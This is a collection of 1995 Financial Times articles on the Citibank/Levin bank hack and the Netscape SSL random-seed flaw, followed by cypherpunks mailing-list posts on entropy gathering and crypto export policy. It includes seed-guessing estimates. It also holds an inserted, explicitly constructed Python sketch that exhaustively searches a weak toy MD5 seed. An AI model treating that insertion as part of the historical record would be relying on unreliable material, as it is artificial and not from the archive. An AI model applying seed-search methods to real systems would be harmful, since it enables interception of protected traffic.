Mr Levin to the US to face trial.

It seems that Citibank was caught out by its technology, which
could not match recent developments available to hackers.

Citibank's main weakness is known to have been its use of
"fixed passwords" to guard its computerised cash management
system. This system, dubbed Citicorp Cash Manager, handles
transactions totalling $500bn every day.

Cash management systems which provide customers with access to
their accounts so that they can make transfers, are inherently
vulnerable to hackers because by definition they allow
third-party access.

In the case of Citibank, access to the cash management system
could be made via telephone lines from anywhere in the world
using a computer. Until the incident, Citibank's system used
fixed or permanent passwords where the customer has only to
enter a name and regular password to gain entry to the system.

However, security experts now agree that this technology has
been rendered ineffective at guarding high-risk systems by the
proliferation of modem communications devices attached to
powerful PCs providing access to the Internet. Hackers now
have ready access to sophisticated software including
"sniffers" -- programs used by network managers which allow
them to look at and capture information on networks. These
give hackers access to huge quantities of information --
including directories of passwords.

The hackers can then take their pick of which password to use.
With bank cash management systems, this virtually amounts to
giving a hacker the choice of which client account to loot.

There are a number of steps banks and other security-conscious
computer network operators can take to defend themselves
against unauthorised intruders. The main option -- and that
introduced by Citibank since the Levin incident -- involves
the use of encrypted passwords that can be used only once.

A "smart card" issued to each customer contains a sequence of
passwords so that a different one is used each time. This
password is then encrypted or scrambled into a form that is,
its manufacturers claim, unreadable to anyone "surfing" the
Internet. The main computer then deciphers the signal and,
able to recognise the sequence of changing passwords, lets the
genuine user into the system.

The chances of someone guessing one of Citibank's passwords
are now one in 11m, says Mr Tom Brady of Enigma Logic of
Concord, California, which supplies this technology to
Citibank. The bank's previous fixed password technology, by
contrast, meant breaking the password system was relatively
straightforward, he says.

Concern centres on how quickly banks and others have reacted
to technological change. Although encryption technology has
been available for more than 10 years, it is only now being
generally introduced, and usually only for systems with
external access.

Barclays Bank introduced encryption for computer systems with
external access before the Citibank incident occurred. Barclays
now feels "fairly comfortable" about the state of its
security, says Mr Philip Severs, deputy director of
operational risk.

However, it is clear that not every bank has closed the door
yet. Mr Severs says the business world is just "on the cusp"
of introducing encryption technology.

Another security adviser says the measures of one leading US
bank, based on both fixed and encrypted passwords, are still
considered weak by experts. Another security specialist
employed by a leading international bank says that senior
management throughout the industry has sometimes been slow to
react to change. "Sometimes people think that their security
is adequate simply because it has not been breached in the
past. At other times, head offices are warned of the dangers,
but fail to act because of cost factors."

Whatever the state of bank security, their experts agree that
their customers' awareness of the problem is lower. "Whenever
payments are made or orders placed electronically, then a
threat exists. The banks are leading on this. Companies are
some way behind," says Mr Severs.

But encryption remains only one way of improving security. The
alleged hacking incident at Citibank involved more than simply
breaching the bank's password system.

The US government claims Mr Levin was able to watch corporate
clients making numerous transactions before deciding which
account to take money from. He also allegedly spotted one
security precaution in place and limited each of his
withdrawals to under 200,000 pounds ($310,540).

Citibank will not comment on its security measures other than
to point to its "smart cards". However, the bank agrees that
there was only partial use of another well-established
security system -- "predefined" transfer routes. These allow
customers to make transfers only to specific bank accounts
making it impossible for a hacker to remove funds for himself.

Citibank offers such an option. However, it is only useful to
some customers. The average corporate customer might find it
suitable because the number of destination accounts they need
is limited. However, for financial institutions making
transfers to many accounts, such a system is too cumbersome.
Perhaps significantly, one of Mr Levin's alleged victims was an
investment company.

Citibank investigators say Mr Levin gave himself away by
making a number of "amateurish" mistakes, but admit he was a
very sophisticated computer operator, allegedly attempting a
particularly elegant fraud.

The bank concedes that it still does not fully understand all
the technical aspects of how Mr Levin allegedly managed to
break in. If and when he is extradited to the US and
introduced to that country's plea bargaining system, he will
be invited to explain further.

Banking security experts agree that the Citibank episode shows
that effective detection systems to track unusual transactions
remain essential. In the Citibank case these worked well,
enabling the attempted fraud to be nipped in the bud,
monitored and losses kept to $400,000.

But they agree that even if new technology is introduced,
keeping one step ahead of the hackers all the time is just not
possible. One with knowledge of the Citibank case comments:
"At the end of the day it cannot be done. Essentially,
security is about being reactive, not pro-active."

Meanwhile, the Citibank episode provides the most public
example yet of how hackers can threaten the integrity of the
international banking system. And just as the Barings collapse
prompted other banks to review their internal management
controls, so Mr Levin's case is having a similar effect on
computer security.

But as one bank security expert says: "It takes an incident
like this to prompt people to review their systems. Whether
they take action however is a different matter."

-----

Financial Times, September 20, 1995, p. 20.


Netscape flaw may deal blow to Internet security

By Louise Kehoe in San Francisco


A security flaw in Netscape Communications' popular Internet
software could deal a serious blow to companies planning to
transact business on the Internet, the global computer
network.

The flaw, discovered by two computer science students at the
University of California at Berkeley, means that financially
sensitive data, such as credit card numbers, sent over the
Internet using Netscape software could be vulnerable to
computer hackers.

"Security is the number one issue" that needs to be resolved
if the Internet is to become a medium for large-scale
electronic commerce, according to Ms Cathy Medich, executive
director of CommerceNet, a consortium of companies that is
developing standards and protocols for conducting business on
the Internet with backing from the US government.

The security breach is a setback for Netscape, raising
concerns about the company's ability to produce reliable
secure software.

Netscape's so-called secure browsers are used by an estimated
66 per cent of people accessing the World Wide Web, the
segment of the Internet where thousands of companies have set
up electronic displays of their products.

The software had been seen as a breakthrough for electronic
commerce, enabling people to buy and sell goods online without
fear of their messages being intercepted.

Netscape confirmed that a security loophole has been
identified, but said it would offer a free security "patch" by
the end of this week on its World Wide Web page
(http://home.netscape.com).

No losses have been reported as a result of the security
breach, Netscape said.

This is the second time that Netscape's encryption has been
"cracked". Last month, a computer expert in France was able to
decode the weaker version of Netscape's cyphers, which the
company is allowed to export.

The security flaw found by the Berkeley students affects all
current versions of Netscape software, including its browsers
and server software, the company said.

However, next week the company will begin trials of a new
version of its browser, which will contain the security patch.

-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David_A Wagner <daw@CS.Berkeley.EDU>
Date: Wed, 20 Sep 95 17:18:06 PDT
To: cypherpunks@toad.com
Subject: Re: NYT on Netscape Crack
Message-ID: <199509202353.QAA20322@guaymas.CS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509201034.AA10521@prakinf.tu-ilmenau.de> you write:
> Is it a good idea to use different (unrelated!) seeded PRNG's for the
> challenge data (which can be seen by sniffing) and the masterkey (which
> should never leave out of client's memory?

No.

If the master key PRNG is poorly seeded, this is still exploitable:
for instance, there is a lot of redundancy in most plaintext, and
this can be used to check each candidate key value.

Just use a cryptographically secure PRNG seeded with enough entropy.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Wed, 20 Sep 95 14:09:11 PDT
To: kelli@zeus.towson.edu
Subject: Re: My new perspective on ITAR (was Re: Munitions shirt (again))
In-Reply-To: <Pine.ULT.3.91.950920151359.6005A-100000@zeus.towson.edu>
Message-ID: <9509202056.AA14060@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Wed, 20 Sep 1995 15:26:08 -0400 (EDT)
>From: "K. M. Ellis" <kelli@zeus.towson.edu>

[re. wearing an RSA T-shirt in the presence of furreners]

The CRYPTO conference sounds like a better alleged violation of export --
unless you take your shirt off and give it to the furrener or lie down on
his scanner to scan your bar codes (or maybe let him take a picture of
the bar codes). :-)

It was the late 70's when an over-enthusiastic person from NSA complained
to the IEEE that it was about to hold a conference including foreign
nationals at which crypto would be discussed.  This is clearly in violation
of the ITAR (dissemination of controlled technical data).  The IEEE
generally thumbed its nose at the NSA person and shortly thereafter (1980)
the IACR was founded and CRYPTO conferences were held.

CRYPTO includes multiple attendees from the crypto services of (former)
(?current?) unfriendly governments.  (is France friendly? :-) It also has
multiple NSA attendees -- so it's not going on in secret from the gov't.

>I might add, however, that two days ago I wore my RSA shirt to my sound
>design class, where the guy I happened to sit down next to recognized it,
>was familiar with what it stood for, and knew all about the Zimmermann
>case; not because he was a crypto enthusiast or a comp sci major, but
>because he works for customs at Baltimore-Washington International
>Airport. 
>
>This event really changed my point of view considering ITAR... I figured 
>that it was just one of those dumb laws that _nobody_ really paid much 
>attention to except for the FBI and that was only because they were 
>looking for a way to nail Zimmermann for writing good crypto.  I had 
>assumed that ITAR was something that  customs agents/L. E. O's/etc. 
>learned about, took a  test on it, then forgot about it the next day.
>
>Interesting... they _really_ are serious, aren't they?

Well ...

I was at an AFCEA talk about export rules about 1.5 years ago and met a
special agent from Customs.  I asked him for Customs' policy on export of
crypto S/W and technical data by USENET News, FTP and WWW.  He seemed very
interested -- wanted my phone number -- was going to come out to visit to
see these sites offering this stuff.

He never came out.

I started e-mailing him asking him whether he was going to come get a tour
of the net -- and he stopped replying.

I can only assume that when he thought it was a single incident (like PRZ)
which could be tracked, he might follow it -- but when I started talking
about dozens or hundreds of people involved (e.g., all US persons talking
crypto techniques on sci.crypt) he lost interest.  I was going to show him
the MIT and TIS sites which release crypto code.  (Those sites have letters
from the State Dept. saying that what we do to restrict export is OK --
even if it is the honor system.)  I was going to show him how easy it is to
get crypto from overseas.

As I said, he lost interest.

 - Carl


+--------------------------------------------------------------------------+
|Carl M. Ellison    cme@acm.org    http://www.clark.net/pub/cme		   |
|PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2  |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 14:02:02 PDT
To: karlton@netscape.com (Phil Karlton)
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <43psn2$6ug@tera.mcom.com>
Message-ID: <199509202101.RAA05534@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton writes:
> I want to address the bug Netscape has with its currently released
> product with respect to seed generation. For the most part this is not
> a crypto issue, but rather a system issue.  Those bits of entropy can
> only be gathered in a system dependent manner.

Quite true.

> Assumption:
>     The basic idea is to feed a sequence of information into the MD5
>     hash, expecting that some of the bits for each sub-sequence would
>     be only be guessable. If we get enough unguessable bits into the mix,
>     then the weak link in the chain would not be the seed generation.

This is true. However, you must get 128 bits of entropy into the MD5
-- this can be accompanied by as much junk as you like, but if there
are at least 128 bits of entropy fed in, the MD5 process will distil
it into what you want.

You might want to read RFC 1750, and examine the code PGP uses for
doing its random generation. Clients do lots of fairly random things
while talking to netscape (click and keyboard press times, etc) that
can be incorporated in, along with other sources of bits. You should
grab bits wherever you can and keep them for when you need them, as
getting 128 bits takes a while.

> 	On Macs and Win* systems
> 	there are "tick" counters that update 60 (or maybe only 16)
> 	times a second.

PC timers inherently run at MHz speed -- they interrupt every 100th of
a second but you can get finer resolution by querying the clock
chip. Does Windows let you do this?

By the way, starting with the time that the program was started is
okay but not great -- I think you probably can only safely assume a
few bits from this.

>     For UNIX we feed the following into the MD5 hash:
> 
> 	ps (-el or aux depending upon system)

I wouldn't do that, since it forces you to have a dependency on
executing a subprocess. 

Were I you, I'd capture the timer on every single keystroke and mouse
click event and feed that in to your entropy generator a la PGP.

> 	System specific info such as hardware serial number or
> 	system id.

By definition, that isn't random. Don't use it.

There are other things you can mix in, besides keystroke and mouse
timings and positions, like system call timings for things that might
take a bit of time.

I can't speak to things on PCs, but...

> 	UUIDCreate if there is an ethernet card

No, sorry, this is very non-random.

>     For MACs:
> 	Machine location (longitude and latitude)

Non-random.

> 	User name

Non-random.

> 	audio volume

Doesn't change very often.

> Known weaknesses:
> 
>     If your X display is not the local machine then the X protocol can
>     be watched. Given that, the data for the reseeding of the MD5 hash
>     will be compromised. [Any scheme that relies on random user input
>     to generate a seed suffers from the same problem.]

That's true, but it's better than it could be, and most users will be
running local.

>     In fact, the entire X protocol issue is one that could take up
>     another 3 pages. An SSLized version of the server would help,
>     but how would anybody export it? You "xhost +" fans are doomed.

You guys should quit thinking of SSL as a good idea. It might be that
the concept is useful for backward compatibility, but don't think of
it as the universal solution just because you developed it.

>     Multi-user Unix machines present a special problem. There are those
>     at Netscape that argue that anybody who has login access to your
>     machine may as well be considered to have root access. There are
>     enough known attacks that this is true to a large extent.  However,
>     I think we can do better than just giving up.

I agree. Don't run on the assumption that everyone has root --
otherwise you'll build something that produces less safety than it could.

> What I would like:
> 
>     Any OS has access to a number of real-world physical sources of
>     randomness. This information is not made available to a user level
>     process. How long did that last seek take? Was there any noise on
>     the microphone? It would be good if the OS could gather that
>     information and make some set of bits available to any process that
>     asks. Having this be part of all OSes would make my job easier.
> 
>     More specifically: A "getnoise()" system call in UNIX could be
>     better than anything I can do and easier. Can we convince the UNIX
>     vendors to start providing that?

Actually, Ted Tso built a /dev/rand for Linux, and there are people
trying to port it to other platforms. This is probably a better idea
than a system call.

> For those that are curious: being responsible for helping to fix a bug that
> is getting front page coverage in major newspapers is not nearly as
> much fun as it sounds.

I've lost my share of nights to security holes announced late in the
day that HAD to be fixed for clients within hours. Welcome to the real
world. You play with the big boys and you get big headaches every once
in a while.

Perry
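
[Added example, not part of the archived messages and not Netscape's or PGP's code: the entropy accounting behind the "128 bits of entropy into the MD5" point in the message above and the "seeded with enough entropy" advice in David Wagner's earlier reply. The seed layout, the 2-bit credit per timing event and every sample value are assumptions constructed for illustration, and SHA-256 stands in for MD5 inside the pool.]

```python
import hashlib
import math
import os
import struct

TARGET_BITS = 128  # amount of entropy that has to reach the hash


def entropy_bound_bits(value_counts):
    """Upper bound on seed entropy in bits: log2 of the number of input
    combinations an observer would have to try. Hashing cannot raise it."""
    return sum(math.log2(n) for n in value_counts.values())


def weak_seed(second, tick, pid):
    """Toy seed (assumed layout): MD5 over the wall-clock second, a
    16-per-second tick counter and a 15-bit PID."""
    return hashlib.md5(struct.pack("<IBH", second, tick, pid)).digest()


def tries_to_find(target, second, ticks=16, pids=1 << 15):
    """Audit check: walk every (tick, pid) pair for a known second and return
    how many hashes were computed before `target` matched, or None."""
    tries = 0
    for tick in range(ticks):
        for pid in range(pids):
            tries += 1
            if weak_seed(second, tick, pid) == target:
                return tries
    return None


class EntropyPool:
    """Mixes samples into a hash, keeps a conservative entropy credit, and
    refuses to hand out a seed until TARGET_BITS have been credited."""

    def __init__(self):
        self._hash = hashlib.sha256()  # swapped in for the thread's MD5
        self.credited_bits = 0.0

    def add(self, sample, credit_bits=0.0):
        """Mix in `sample`. Credit only what an observer could not guess;
        junk with credit 0 is mixed in but never counted."""
        self._hash.update(struct.pack("<I", len(sample)) + sample)
        self.credited_bits += credit_bits

    def ready(self):
        return self.credited_bits >= TARGET_BITS

    def seed(self):
        if not self.ready():
            raise RuntimeError(
                f"only {self.credited_bits:.0f} of {TARGET_BITS} bits credited")
        return self._hash.digest()[:16]


if __name__ == "__main__":
    # Constructed inputs: connection second visible to an observer,
    # 16 ticks per second, 15-bit PID.
    bound = entropy_bound_bits({"second": 1, "tick": 16, "pid": 1 << 15})
    print(f"weak seed: at most {bound:.0f} bits behind a 128-bit MD5 output")
    target = weak_seed(811634400, 9, 12345)
    print("exhaustive check matched after", tries_to_find(target, 811634400), "hashes")

    pool = EntropyPool()
    pool.add(b"hw-serial-0001")   # constructed; non-random, zero credit
    pool.add(b"username")         # constructed; non-random, zero credit
    events = 0
    while not pool.ready():       # constructed event timestamps
        pool.add((1000003 * events + 17).to_bytes(8, "little"), 2.0)
        events += 1
    print(f"pool ready after {events} timing events:", pool.seed().hex())

    # Where the OS offers a random device, credit its output in full instead.
    os_pool = EntropyPool()
    os_pool.add(os.urandom(16), 128.0)
    print("seed from OS source:", os_pool.seed().hex())
```

The weak seed is a full-width MD5 value, yet the audit bounds it at 19 bits and the exhaustive check confirms that bound; the pool makes the shortfall explicit by refusing to produce a seed until enough credited input has arrived.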




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@dg.thepoint.net>
Date: Thu, 21 Sep 95 11:55:19 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: NSA and Netscape Crack
In-Reply-To: <ac84fbf926021004d2c2@[205.199.118.202]>
Message-ID: <Pine.D-G.3.91.950920173850.8197B-100000@dg.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 19 Sep 1995, Timothy C. May wrote:
> 
> By the way, if we count our own Matt Blaze's work on exposing weaknesses of
> the Tessera/Skipjack/Clipper (they blur together) card as a "Cypherpunks
> achievement," then the Cypherpunks have actually played a dominant role in
> cracking these recent standards. (Not to mention the RC4 code postings, the
> various Cypherpunks involved in the RSA-129 and "BlackNet" factorizations,
> etc.)
> 
> Well done, of course!
>

Absolutely.  And why not enter the PR fray by publicizing those 
successes?  Press release/identify persons for followups/etc.  (All with 
permission/participation of those who did it).  

Certainly, Cypherpunks has gotten press lately, and what I've seen has 
been good press.  Capitalize on it.

Finally, I've got to say that, as someone new to the concepts discussed 
here, I found it extremely cool to read about the latest break here and 
then see it in the news a day or two later.

EBD


 
> --Tim May
> 
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joseph M. Reagle Jr." <reagle@rpcp.mit.edu>
Date: Wed, 20 Sep 95 14:41:15 PDT
To: cypherpunks@toad.com
Subject: French Navy Security Compromised (Current by Shallow)
Message-ID: <9509202144.AA05842@rpcp.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain


Heard that a very large break from computer 'hackers' has taken place in
France's navy.  Information regarding ship-identification was stolen.

-------------------------
Regards,                   
Joseph M. Reagle Jr.     http://farnsworth.mit.edu/~reagle/home.html
reagle@mit.edu           0C 69 D4 E8 F2 70 24 33  B4 5E 5E EC 35 E6 FB 88





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 17:49:02 PDT
To: David_A Wagner <daw@cs.berkeley.edu>
Subject: Re: netscape's response
In-Reply-To: <199509210016.RAA20367@guaymas.CS.Berkeley.EDU>
Message-ID: <9509201745.ZM206@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 20,  5:16pm, David_A Wagner wrote:
> Subject: Re: netscape's response
> In article <9509200139.ZM206@tofuhut> you write:
> > On Sep 20, 12:29am, Christian Wettergren wrote:
> > > One wild idea that I just got was to have servers and clients exchange
> > > random numbers (not seeds of course), in a kind of chaining way. Since
> > > most viewers connect to a number of servers, and all servers are
> > > connected to by many clients, they would mix "randomness sources" with
> > > each other, making it impossible to observe the local environment
> > > only. And the random values would of course be encrypted under the
> > > session key, making it impossible to "watch the wire".
> > 
> >   Wow, this is a great idea!!
> 
> Are you quite sure this is a good idea?
> 
> I'd be very scared of it.  In particular, it opens up the chance for
> adversaries to feed you specially chosen numbers to pollute your seeds.

  What I should have said is that it's a very interesting idea.  Given
current perceptions of netscape, I should have made clear that I
wouldn't do something like this without getting a lot more discussion
and review of possible dangers and how to avoid them.  I certainly
can't fault anyone for wondering if we would just implement this
without thinking it through, given recent events.

	--Jeff




-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 14:56:33 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
In-Reply-To: <199509200812.BAA17876@infinity.c2.org>
Message-ID: <43q2l8$l10@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <9509200248.ZM206@tofuhut>, Jeff Weinstein <jsw@netscape.com> wrote:
>On Sep 20,  1:12am, sameer wrote:
>> 	Is UNIX really the most vulnerable? How many bits did the
>> tickcount account for? Seems to me that guessing just time & tick
>> would be easier than guessing time, pid and ppid if you are not logged
>> into the machine in question. . .
>
>  This is really dependent on how long Windows has been running.  If you
>boot windows and immediately start an ssl connection, then the number
>will be pretty low, but if you don't make the first SSL connection until
>later, it should get better.  I think an hour would get you around 16-bits,
>but this is just a guestimate on my part.  If you leave your machine
>running windows for days you will get close to 32bits.
>
But you don't have the usec at all, if I read your post correctly.

Windoze uses the time in seconds (essentially 0 bits of randomness,
maybe a couple, since Windoze machines don't set their clocks very well),
and the tick count.

In one hour, the tick count counts to 3600*1000, or about 22 bits.
Many hours give another bit or two.

Thus, in total, given *no* information except the assumption that the
clock is reasonably accurate, you get at *most* 25 bits.

Since our code can do 21 bits in 1 minute, we'll need 16 minutes.

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ian Goldberg <iang@cory.EECS.Berkeley.EDU>
Date: Wed, 20 Sep 95 20:47:15 PDT
To: cypherpunks@toad.com
Subject: Euro-Clipper
Message-ID: <199509210102.SAA15389@cory.EECS.Berkeley.EDU>
MIME-Version: 1.0
Content-Type: text/plain


I don't think I've seen this here (but it was on a bunch of security
newsgroups...)

   - Ian

Forwarded message:
> 
> According to an article in `Communications Week International', the
> 34-nation Council of Europe has agreed to outlaw strong encryption
> products which do not make keys available to governments.
> 
> The article, `Euro-Clipper chip scheme proposed', is on the front page
> of the magazine's issue 151, dated 18th September, which arrived in my
> mail this morning.
> 
> It relates that the policy was approved on the 8th September at
> Strasbourg by the Council, and coincides with an attempt by the
> European Commission to propose a pan-European encryption standard. The
> Council - unlike the Commission - has no statutory powers to enforce
> its recommendations. However, Peter Csonka, the chairman of the
> committee that drafted the document (and an administrative officer at
> the Council's division of crime problems) says that `it is rare for
> countries to reject Council of Europe recommendations'.
> 
> The proposal would make telecomms operators responsible for decrypting
> traffic and supplying it to governments when asked.  It would also
> `change national laws to enable judicial authorities to chase hackers
> across borders'.
> 
> Opposition to this measure was expressed by Mike Strezbek, VP
> responsible for European telecomms at JP Morgan, who said that his
> organisation `will challenge any attempt to limit the power of our
> network encryption technologies very strongly'.
> 
> Csonka said that the Council had given consideration to business
> interests but had tried to strike a balance between privacy and
> justice. However, `it remains possible that cryptography is available
> to the public which cannot be deciphered,' his document says. `This
> might lead to the conclusion to put restrictions on the possession,
> distribution, or use of cryptography.'
> 
> Apparently another international organisation, the OECD, has called a
> conference of its members in December to devise a strategy on
> encryption.
> 
> I for one will be making clear to my MP that his stand on this issue
> will determine how I cast my ballot at the next election. I note that
> John Major stated in a 1994 parliamentary written reply to David Shaw
> MP that the government did not intend to legislate on data encryption.
> I am disappointed that government policy has changed to the point of
> supporting the Council of Europe, and that this change has sneaked 
> through during the parliamentary recess.
> 
> Ross Anderson
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 20 Sep 95 16:10:23 PDT
To: cypherpunks@toad.com
Subject: software
In-Reply-To: <013.01607783.LFWS37A@prodigy.com>
Message-ID: <9509202310.AA12270@alpha>
MIME-Version: 1.0
Content-Type: text/plain



MR STEVE R. KELL writes:
 > I need new crypt software w/instruction if possible.

My favorite cypherpunks mail so far.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iagoldbe@csclub.uwaterloo.ca (Ian Goldberg)
Date: Wed, 20 Sep 95 15:19:12 PDT
To: cypherpunks@toad.com
Subject: Re: Please send me SSL problems...
In-Reply-To: <199509201004.DAA23933@ammodump.mcom.com>
Message-ID: <43q40a$q8a@calum.csclub.uwaterloo.ca>
MIME-Version: 1.0
Content-Type: text/plain


In article <199509201004.DAA23933@ammodump.mcom.com>,
Jeff Weinstein  <jsw@netscape.com> wrote:
>
>  I'd just like to let all cypherpunks know that I'm really interested in
>getting any feedback you might have about security problems with Netscape
>products.  I'm particularly interested in bugs in our implementation
>of SSL, and problems in the protocol that are not addressed in SSL 3.0.

Well, if you'd release Netscape source, we could check its
implementation... :-)

   - Ian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 15:27:51 PDT
To: John Gilmore <gnu@toad.com>
Subject: Re: Project: a standard cell random number generator
In-Reply-To: <9509202150.AA08164@toad.com>
Message-ID: <199509202227.SAA05667@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



On this same track, I suggest that "/dev/random" devices for unix are
an excellent idea. Ted Tso did one for Linux that steals all the bits
of semi-random timing information it can. Such a driver has the
feature that it can be plugged into either a software pseudodriver or
a hardware device if one is available.

John Gilmore writes:
> Do we know any solid state physics / circuit design experts who think
> this might be a fun thing to do?  I bet you could get a paper out of
> it.  And probably improve the world a few years later, when companies
> used your paper to close another hole in their computer security.

There are companies that sell hardware RNGs -- Newbridge, for instance
-- but they charge an arm and a leg for them.

There is also a company that I got literature from that sells RS232
interfaceable radiation detectors, which I have thought about using
for this purpose, but they are also way too expensive.

As you say, what one really needs is something that fits in a small
section of a chip. Unfortunately, this stuff is very delicate analog
-- not the usual thing you find in standard cell -- and very easy to
screw up.

> PS: It's possible that NSA collusion with chip-makers could produce
> bad pseudo-random-number generators in popular chips, giving NSA a
> back-door into any algorithm that used them.  This would be harder to
> detect than poor software random number generators, since it requires
> prying the lid off the chip, getting out your microscope, and
> reverse-engineering the circuit, instead of just disassembling the
> software.  In this sense, NSA ought to be *encouraging* Intel and
> IBM and Motorola to put "generate random bits" instructions into
> their instruction sets...

An interesting concept!

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Weinstein" <jsw@netscape.com>
Date: Wed, 20 Sep 95 20:46:40 PDT
To: cypherpunks@toad.com
Subject: Re: netscape's response
Message-ID: <9509201835.ZM154@tofuhut>
MIME-Version: 1.0
Content-Type: text/plain


NOTE: my first attempt to send this bounced at toad.com

On Sep 20,  5:16pm, David_A Wagner wrote:
> Subject: Re: netscape's response
> In article <9509200139.ZM206@tofuhut> you write:
> > On Sep 20, 12:29am, Christian Wettergren wrote:
> > > One wild idea that I just got was to have servers and clients exchange
> > > random numbers (not seeds of course), in a kind of chaining way. Since
> > > most viewers connect to a number of servers, and all servers are
> > > connected to by many clients, they would mix "randomness sources" with
> > > each other, making it impossible to observe the local environment
> > > only. And the random values would of course be encrypted under the
> > > session key, making it impossible to "watch the wire".
> > 
> >   Wow, this is a great idea!!
> 
> Are you quite sure this is a good idea?
> 
> I'd be very scared of it.  In particular, it opens up the chance for
> adversaries to feed you specially chosen numbers to pollute your seeds.

  What I should have said is that it's a very interesting idea.  Given
current perceptions of netscape, I should have made clear that I
wouldn't do something like this without getting a lot more discussion
and review of possible dangers and how to avoid them.  I certainly
can't fault anyone for wondering if we would just implement this
without thinking it through, given recent events.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 20 Sep 95 15:41:55 PDT
To: Phil Karlton <karlton@netscape.com>
Subject: Re: "random" number seeds vs. Netscape
In-Reply-To: <30609562.15FB@netscape.com>
Message-ID: <199509202240.SAA05690@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Phil Karlton writes:
> Perry E. Metzger wrote:
> > This is true. However, you must get 128 bits of entropy into the MD5
> > -- this can be accompanied by as much junk as you like, but if there
> > are at least 128 bits of entropy fed in, the MD5 process will distil
> > it into what you want.
> 
> My assumption was that if we conservatively counted at least 300 bits
> of entropy, we would have 128 for sure. Not very scientific,

It's not a bad way to go. You have to make sure that you have at least
that many bits of ENTROPY, however. Stuff like keystroke timings
should only be thought of as handing you a bit or so per click.

> > You might want to read RFC 1750,
> 
> Did that. It talks about a lot of the pitfalls. Unfortunately it
> does not address (nor can it realistically be expected to address)
> details of what to look for on a particular version of an OS running
> on some particular platform.

That is true. 

> > PC timers inherently run at Mhz speed -- they interrupt every 100th of
> > a second but you can get finer resolution by querying the clock
> > chip. Does Windows let you do this?
> 
> I don't know, but I'll forward this on to our PC guys. It might be a
> portability problem.

It actually shouldn't be -- every PC has the same timer chip or a
compatible one. The real question is whether Windows lets you get the
data out.

> > I wouldn't do that, since it forces you to have a dependency on
> > executing a subprocess.
> 
> We try to be careful about dealing with the subprocess failing to run.

Also be especially careful about how you run the thing! Don't use
popen or anything like it!

> > >       System specific info such as hardware serial number or
> > >       system id.
> 
> > By definition, that isn't random. Don't use it.
> 
> It doesn't hurt. It's also information that is not available to the external
> eavesdropper. Other than execution time, why should I remove it from the list
> of bits being fed into the hash?

You have to build to the model of someone who knows everything there
is to know about the machine. Why? Well, many pieces of information
can in fact be extracted -- license servers and SNMP agents are a way
to extract things like system IDs. (Overly chatty SNMP extensions and
similar stuff make me nervous about using too much ps based entropy,
by the by.)

If you put PROM ID into the hash, don't count it as a source of bits
-- just think of it as something extra to throw in to make life harder
-- and heavily comment that it is not to be counted in the magic 300
bits you are trying to extract. Remember, plan for the worst, not the
best, and you will never have trouble if the threat model gets worse.

As a security consultant, I always emphasize to clients that you have
to plan for worst case -- always. That way you can sleep at
night. Always assume the adversary has a way to break the individual
components of your system.

When I build firewalls, I rig them so that both an outer filtering
router, a tightened down application gateway, and an inner filtering
router must all fail in order for people to break in. I build things
